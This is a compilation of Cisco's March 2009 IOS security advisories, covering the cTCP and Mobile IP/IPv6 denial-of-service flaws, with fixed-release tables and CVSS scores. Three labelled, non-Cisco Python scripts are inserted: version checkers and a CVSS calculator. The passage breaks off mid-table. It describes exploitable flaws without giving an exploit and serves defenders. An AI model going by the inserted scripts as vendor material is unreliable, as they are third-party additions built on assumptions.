  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+--------------------------------------------------------+
| Revision 1.0 | 2009-March-25 | Initial public release. |
+--------------------------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAknKUaYACgkQ86n/Gc8U/uBSWwCbBgAQRNBNdft9MYK8bC1MP/Z4
4D8AnA7qaiFqAdeWWbS+p4K601XNoo4S
=Rvhp
-----END PGP SIGNATURE-----
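
Added example (not part of the Cisco advisory, and not Cisco code): a Python check that combines the two things the cTCP advisory asks an operator to look at, the release string from show version and the presence of crypto ctcp in the configuration. The fixed-release data is copied from the advisory's table; the function names, the comparison rule used for the two-entry 12.4T row, the space-separated port list and the sample configuration are assumptions made for illustration.

```python
import re
from dataclasses import dataclass

# "First Fixed Release" entries copied from the advisory's table. Trains the
# table marks "Not Vulnerable" (and every 12.0-12.3 train) are simply absent.
FIRST_FIXED = {
    "12.4T": ["12.4(15)T9", "12.4(20)T2"],
    "12.4XZ": ["12.4(15)XZ2"],
    "12.4YA": ["12.4(20)YA2"],
}
CTCP_INTRODUCED = "12.4(9)T"   # per the advisory's "Vulnerable Products" note
DEFAULT_CTCP_PORT = 10000      # used when the port keyword is not configured

RELEASE_RE = re.compile(r"(\d+\.\d+)\((\d+)[a-z]?\)([A-Z]*)(\d*)")
VERSION_RE = re.compile(r"Version\s+(\d+\.\d+\(\d+[a-z]?\)[A-Z]*\d*)")


@dataclass(frozen=True)
class Release:
    base: str      # e.g. "12.4"
    maint: int     # number in parentheses
    train: str     # "T", "XZ", or "" for mainline
    rebuild: int   # trailing digits, 0 when absent

    @property
    def train_name(self):
        return self.base + self.train


def parse_release(text):
    m = RELEASE_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised IOS release: {text!r}")
    base, maint, train, rebuild = m.groups()
    return Release(base, int(maint), train, int(rebuild or 0))


def release_is_vulnerable(rel):
    """Assumed rule: a release sharing its maintenance number with a listed
    fix is compared by rebuild; any other release is compared against the
    highest listed maintenance number for its train."""
    fixes = [parse_release(f) for f in FIRST_FIXED.get(rel.train_name, [])]
    if not fixes:
        return False                      # train not listed as affected
    intro = parse_release(CTCP_INTRODUCED)
    if rel.train_name == intro.train_name and rel.maint < intro.maint:
        return False                      # predates the cTCP feature
    same = [f for f in fixes if f.maint == rel.maint]
    if same:
        return rel.rebuild < same[0].rebuild
    return rel.maint < max(f.maint for f in fixes)


def ctcp_listen_ports(running_config):
    """Return the cTCP listening ports, or [] when cTCP is not configured."""
    ports, enabled = [], False
    for line in running_config.splitlines():
        m = re.match(r"\s*crypto ctcp\b(.*)", line)
        if not m:
            continue                      # also skips "no crypto ctcp"
        enabled = True
        pm = re.search(r"\bport\b(.*)", m.group(1))
        if pm:
            ports += [int(p) for p in re.findall(r"\d+", pm.group(1))]
    if not enabled:
        return []
    return ports or [DEFAULT_CTCP_PORT]


def assess(show_version, running_config):
    m = VERSION_RE.search(show_version)
    if not m:
        raise ValueError("no IOS 'Version' string in show version output")
    rel = parse_release(m.group(1))
    ports = ctcp_listen_ports(running_config)
    if not release_is_vulnerable(rel):
        status = "not_affected"
    elif ports:
        status = "exposed"                # vulnerable release, cTCP listening
    else:
        status = "vulnerable_ctcp_off"    # upgrade still advised
    return {"release": m.group(1), "ctcp_ports": ports, "status": status}


# show version banners as printed in the advisory; the configuration is constructed.
SHOW_VERSION_1841 = (
    "Router#show version\n"
    "Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), "
    "Version 12.4(20)T, RELEASE SOFTWARE (fc3)\n"
)
SHOW_VERSION_2500 = (
    "Router#show version\n"
    "Cisco Internetwork Operating System Software\n"
    "IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)\n"
)
CONSTRUCTED_CONFIG = "hostname Router\ncrypto ctcp port 10000\n"

if __name__ == "__main__":
    print(assess(SHOW_VERSION_1841, CONSTRUCTED_CONFIG))
    print(assess(SHOW_VERSION_2500, CONSTRUCTED_CONFIG))
```

The check only sees what is in the text it is given; the advisory's statement that EZVPN clients are unaffected still has to be confirmed from the device's role.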

From - Wed Mar 25 14:52:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cab
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39836-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B84E0EC183
for <lists@securityspace.com>; Wed, 25 Mar 2009 14:52:42 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 55FDD236FBB; Wed, 25 Mar 2009 09:33:38 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 591 invoked from network); 25 Mar 2009 16:09:12 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.mobileip@psirt.cisco.com>
Reply-To: psirt@cisco.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco IOS Software Mobile IP and Mobile IPv6
Vulnerabilities

Advisory ID: cisco-sa-20090325-mobileip

http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

Revision 1.0

For Public Release 2009 March 25 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
======
Devices that are running Cisco IOS Software and configured for Mobile
IP Network Address Translation (NAT) Traversal feature or Mobile IPv6
are vulnerable to a denial of service (DoS) attack that may result in
a blocked interface.

Cisco has released free software updates that address these
vulnerabilities.

This advisory is posted at the following link:
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.

http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml

Individual publication links are listed below:

  * Cisco IOS cTCP Denial of Service Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

  * Cisco IOS Software Multiple Features IP Sockets Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml

  * Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

  * Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

  * Cisco IOS Software Session Initiation Protocol Denial of Service
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml

  * Cisco IOS Software Multiple Features Crafted TCP Sequence
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

  * Cisco IOS Software Multiple Features Crafted UDP Packet
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml

  * Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

Affected Products
================
Devices that are running an affected version of Cisco IOS Software
and configured for Mobile IP NAT Traversal feature or Mobile IPv6 are
vulnerable.

Vulnerable Products
+------------------

Devices running Cisco IOS Software and configured for Mobile IP NAT
Traversal feature will have a line similar to the following in the
output of the show running-config command:

    ip mobile home-agent nat traversal [...]

or

    ip mobile foreign-agent nat traversal [...]

or

    ip mobile router-service collocated registration nat traversal [...]

Devices running Cisco IOS Software and configured for Mobile IPv6
will have a line similar to the following in the output of the show
running-config command:

    ipv6 mobile home-agent

To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to "Cisco Internetwork Operating System Software" or
"Cisco IOS Software." The image name displays in parentheses,
followed by "Version" and the Cisco IOS Software release name. Other
Cisco devices do not have the show version command or may provide
different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:

        Router#show version
        Cisco Internetwork Operating System Software
        IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
        Technical Support: http://www.cisco.com/techsupport
        Copyright (c) 1986-2008 by cisco Systems, Inc.
        Compiled Mon 17-Mar-08 14:39 by dchih
        !--- output truncated


The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.4(20)T with an installed image name of
C1841-ADVENTERPRISEK9-M:

        Router#show version
        Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
        Technical Support: http://www.cisco.com/techsupport
        Copyright (c) 1986-2008 by Cisco Systems, Inc.
        Compiled Thu 10-Jul-08 20:25 by prod_rel_team
        !--- output truncated


Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link: http://www.cisco.com/warp/public/620/1.html
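
The identification steps above can be run against saved output of show running-config and show version. The following Python script is an added example, not part of the Cisco advisory: the function names and the sample configuration are constructed for illustration, and the train name it returns is the row to look up in the release table under "Software Versions and Fixes".

```python
import re

# Running-config lines the advisory lists as indicators of an exposed feature.
# The advisory says "a line similar to", so extra arguments between or after
# the keywords are tolerated.
FEATURE_PATTERNS = [
    ("Mobile IP NAT Traversal (home agent)",
     re.compile(r"^ip mobile home-agent\b.*\bnat traversal\b")),
    ("Mobile IP NAT Traversal (foreign agent)",
     re.compile(r"^ip mobile foreign-agent\b.*\bnat traversal\b")),
    ("Mobile IP NAT Traversal (collocated mobile router)",
     re.compile(r"^ip mobile router-service collocated registration\b.*\bnat traversal\b")),
    ("Mobile IPv6 home agent",
     re.compile(r"^ipv6 mobile home-agent\b")),
]

# "(IMAGE-NAME), Version RELEASE," as shown in both banner styles in the advisory.
BANNER_RE = re.compile(r"\(([^)\s]+)\), Version ([^,\s]+)")
# Release names such as 12.3(26), 12.4(20)T, 12.4(15)T8, 12.3(14)YM13, 12.4(18e).
RELEASE_RE = re.compile(r"^(\d+\.\d+)\((\d+)([a-z]?)\)([A-Z]*)(\d*)[a-z]?$")


def find_exposed_features(running_config):
    """Return the advisory's feature indicators present in a running-config."""
    found = []
    for raw in running_config.splitlines():
        line = raw.strip()          # interface-level commands are indented
        if not line or line.startswith("!"):
            continue                # blank lines and comments
        for name, pattern in FEATURE_PATTERNS:
            if pattern.search(line) and name not in found:
                found.append(name)
    return found


def parse_show_version(show_version):
    """Return (image name, release name) from the system banner, or None."""
    for line in show_version.splitlines():
        if "IOS" in line:
            match = BANNER_RE.search(line)
            if match:
                return match.group(1), match.group(2)
    return None


def parse_release(release):
    """Split a release name into its parts; 'train' is the table row to consult."""
    match = RELEASE_RE.match(release)
    if not match:
        return None
    major, maintenance, _letter, train, rebuild = match.groups()
    return {
        "major": major,
        "maintenance": int(maintenance),
        "train": major + train,     # "12.4T"; plain "12.4" for mainline
        "rebuild": int(rebuild) if rebuild else None,
    }


def audit(running_config, show_version):
    """Combine both checks for one device."""
    banner = parse_show_version(show_version)
    image, release = banner if banner else (None, None)
    parsed = parse_release(release) if release else None
    return {
        "image": image,
        "release": release,
        "train": parsed["train"] if parsed else None,
        "features": find_exposed_features(running_config),
    }


# Constructed sample configuration (hostname, addresses and trailing
# arguments are illustrative only).
SAMPLE_RUNNING_CONFIG = """\
!
hostname edge-ha1
!
ip mobile home-agent nat traversal keepalive 45
!
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 ipv6 mobile home-agent
!
"""

# Banner taken from the advisory's second show version example.
SAMPLE_SHOW_VERSION = """\
Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
"""

if __name__ == "__main__":
    print(audit(SAMPLE_RUNNING_CONFIG, SAMPLE_SHOW_VERSION))
```

A device is in scope only when the features list is non-empty and its train row in the release table shows the running release as earlier than a first fixed release.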

Products Confirmed Not Vulnerable
+--------------------------------

Cisco IOS XR is not affected by these vulnerabilities.

Cisco IOS XE is not affected by these vulnerabilities.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
======
Mobile IP is part of both IPv4 and IPv6 standards. Mobile IP allows a
host device to be identified by a single IP address even though the
device may move its physical point of attachment from one network to
another. Regardless of movement between different networks,
connectivity at the different points is achieved seamlessly without
user intervention. Roaming from a wired network to a wireless or
wide-area network is also possible.

More information on Mobile IPv6 can be found at the following link:
http://www.cisco.com/en/US/docs/ios/ipv6/configuration/guide/ip6-mobile.html

The Mobile IP Support NAT Traversal feature is documented in RFC
3519. It introduces an alternative method for tunneling Mobile IP
data traffic. New extensions in the Mobile IP registration request
and reply messages have been added for establishing User Datagram
Protocol (UDP) tunneling. This feature allows mobile devices in
collocated mode that use a private IP address (RFC 1918) or foreign
agents (FAs) that use a private IP address for the care-of address
(CoA) to establish a tunnel and traverse a NAT-enabled router with
mobile node (MN) data traffic from the home agent (HA).

More information on Mobile IP NAT Traversal feature can be found at
the following link: 
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t8/feature/guide/gtnatmip.html

Devices that are running an affected version of Cisco IOS Software
and configured for Mobile IPv6 or Mobile IP NAT Traversal feature are
affected by a DoS vulnerability. A successful exploitation of this
vulnerability could cause an interface to stop processing traffic
until the system is restarted. Offending packets need to be destined
to the router for a successful exploit.

These vulnerabilities are documented in the Cisco Bug IDs CSCsm97220 
and CSCso05337 and have been assigned Common Vulnerabilities and 
Exposures (CVE) IDs CVE-2009-0633 and CVE-2009-0634.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CSCsm97220 - Input queue wedged by MIPv6 packets

CVSS Base Score - 7.8

 Access Vector           - Network
 Access Complexity       - Low
 Authentication          - None
 Confidentiality Impact  - None
 Integrity Impact        - None
 Availability Impact     - Complete

CVSS Temporal Score - 6.4

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed

CSCso05337 - HA: Input queue wedged by ICMP packet

CVSS Base Score - 7.1

 Access Vector           - Network
 Access Complexity       - Medium
 Authentication          - None
 Confidentiality Impact  - None
 Integrity Impact        - None
 Availability Impact     - Complete

CVSS Temporal Score - 5.9

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed
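
The base and temporal scores above can be reproduced from the listed metrics, and the same formulas give the environmental score the advisory leaves to customers. The following Python calculator is an added example, not part of the Cisco advisory: it uses the CVSS version 2.0 weights and equations, and the environmental inputs in the usage lines are constructed assumptions about a local network.

```python
from decimal import Decimal, ROUND_HALF_UP


def _weights(table):
    return {name: Decimal(value) for name, value in table.items()}


# CVSS v2.0 metric weights.
AV = _weights({"Local": "0.395", "Adjacent Network": "0.646", "Network": "1.0"})
AC = _weights({"High": "0.35", "Medium": "0.61", "Low": "0.71"})
AU = _weights({"Multiple": "0.45", "Single": "0.56", "None": "0.704"})
CIA = _weights({"None": "0.0", "Partial": "0.275", "Complete": "0.660"})
E = _weights({"Unproven": "0.85", "Proof-of-Concept": "0.90",
              "Functional": "0.95", "High": "1.0", "Not Defined": "1.0"})
RL = _weights({"Official-Fix": "0.87", "Temporary-Fix": "0.90",
               "Workaround": "0.95", "Unavailable": "1.0", "Not Defined": "1.0"})
RC = _weights({"Unconfirmed": "0.90", "Uncorroborated": "0.95",
               "Confirmed": "1.0", "Not Defined": "1.0"})
CDP = _weights({"None": "0", "Low": "0.1", "Low-Medium": "0.3",
                "Medium-High": "0.4", "High": "0.5", "Not Defined": "0"})
TD = _weights({"None": "0", "Low": "0.25", "Medium": "0.75",
               "High": "1.0", "Not Defined": "1.0"})
REQ = _weights({"Low": "0.5", "Medium": "1.0", "High": "1.51", "Not Defined": "1.0"})


def _round1(value):
    return value.quantize(Decimal("0.1"), rounding=ROUND_HALF_UP)


def _exploitability(m):
    # Base exploitability subscore (not the temporal "Exploitability" metric).
    return 20 * AV[m["Access Vector"]] * AC[m["Access Complexity"]] * AU[m["Authentication"]]


def _impact(m, cr="Not Defined", ir="Not Defined", ar="Not Defined"):
    c = CIA[m["Confidentiality Impact"]] * REQ[cr]
    i = CIA[m["Integrity Impact"]] * REQ[ir]
    a = CIA[m["Availability Impact"]] * REQ[ar]
    return Decimal("10.41") * (1 - (1 - c) * (1 - i) * (1 - a))


def _score(impact, exploitability):
    f = Decimal(0) if impact == 0 else Decimal("1.176")
    raw = Decimal("0.6") * impact + Decimal("0.4") * exploitability - Decimal("1.5")
    return _round1(raw * f)


def _temporal_factor(m):
    return E[m["Exploitability"]] * RL[m["Remediation Level"]] * RC[m["Report Confidence"]]


def base_score(m):
    return float(_score(_impact(m), _exploitability(m)))


def temporal_score(m):
    return float(_round1(_score(_impact(m), _exploitability(m)) * _temporal_factor(m)))


def environmental_score(m, cdp="Not Defined", td="Not Defined",
                        cr="Not Defined", ir="Not Defined", ar="Not Defined"):
    # Adjusted impact is capped at 10 before the base equation is reapplied.
    adjusted_impact = min(Decimal(10), _impact(m, cr, ir, ar))
    adjusted_temporal = _round1(_score(adjusted_impact, _exploitability(m)) * _temporal_factor(m))
    return float(_round1((adjusted_temporal + (10 - adjusted_temporal) * CDP[cdp]) * TD[td]))


# Metric values exactly as listed in the advisory.
CSCSM97220 = {
    "Access Vector": "Network", "Access Complexity": "Low", "Authentication": "None",
    "Confidentiality Impact": "None", "Integrity Impact": "None",
    "Availability Impact": "Complete",
    "Exploitability": "Functional", "Remediation Level": "Official-Fix",
    "Report Confidence": "Confirmed",
}
CSCSO05337 = dict(CSCSM97220, **{"Access Complexity": "Medium"})

if __name__ == "__main__":
    for name, metrics in (("CSCsm97220", CSCSM97220), ("CSCso05337", CSCSO05337)):
        print(name, base_score(metrics), temporal_score(metrics),
              # Constructed assumption: availability matters most on this network.
              environmental_score(metrics, ar="High"),
              # Constructed assumption: few devices run the affected features.
              environmental_score(metrics, td="Low"))
```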

Impact
=====
Successful exploitation of the vulnerability may cause an
interface to stop processing traffic, resulting in a DoS condition.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Release" column of the
table.

+-------------------------------------------------------------------+
|   Major    |          Availability of Repaired Releases           |
|  Release   |                                                      |
|------------+------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.0-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.1-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.2-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|-------------------------------------------------------------------|
| There are no affected 12.2 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                      | Recommended   |
| 12.3-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|------------+--------------------------------------+---------------|
| 12.3       | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3B      | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3BC     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3BW     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3EU     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JEA    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JEB    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JEC    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JK     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JL     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JX     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3T      | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.3TPC    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3VA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XB     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XC     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XD     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XE     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XF     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XG     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XI     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XJ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XK     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XL     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XQ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XR     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XS     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XU     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XW     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XX     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XY     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XZ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YD     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YF     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YG     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YH     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YI     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YJ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            | Releases prior to 12.3(11)YK3 are    | 12.4(22)T1    |
|            | vulnerable, release 12.3(11)YK3 and  |               |
| 12.3YK     | later are not vulnerable; first      | 12.4(15)T9;   |
|            | fixed in 12.4T                       | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.3YM     | 12.3(14)YM13                         | 12.3(14)YM13  |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YQ     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YS     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YT     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YU     | Vulnerable; migrate to 12.4T         | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            | Releases prior to 12.3(14)YX10 are   |               |
| 12.3YX     | vulnerable, release 12.3(14)YX10 and | 12.3(14)YX14  |
|            | later are not vulnerable;            |               |
|------------+--------------------------------------+---------------|
| 12.3YZ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3ZA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| Affected   |                                      | Recommended   |
| 12.4-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(18e)     |
|            | 12.4(18e)                            |               |
| 12.4       |                                      | 12.4(23a);    |
|            | 12.4(23a); Available on 30-APR-2009  | Available on  |
|            |                                      | 30-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4JA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JDA    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JK     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JL     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JMA    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JMB    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JX     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4MD     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4MR     | 12.4(19)MR                           | 12.4(19)MR2   |
|------------+--------------------------------------+---------------|
| 12.4SW     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            | 12.4(20)T                            | 12.4(22)T1    |
|            |                                      |               |
| 12.4T      | 12.4(15)T8                           | 12.4(15)T9;   |
|            |                                      | Available on  |
|            | 12.4(15)T9; Available on 29-APR-2009 | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XA     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            | 12.4(15)T8                           | 12.4(22)T1    |
|            |                                      |               |
| 12.4XB     | 12.4(20)T                            | 12.4(15)T9;   |
|            |                                      | Available on  |
|            | 12.4(15)T9; Available on 29-APR-2009 | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XC     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            | 12.4(4)XD12; Available on            | 12.4(4)XD12;  |
| 12.4XD     | 27-MAR-2009                          | Available on  |
|            |                                      | 27-MAR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XE     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
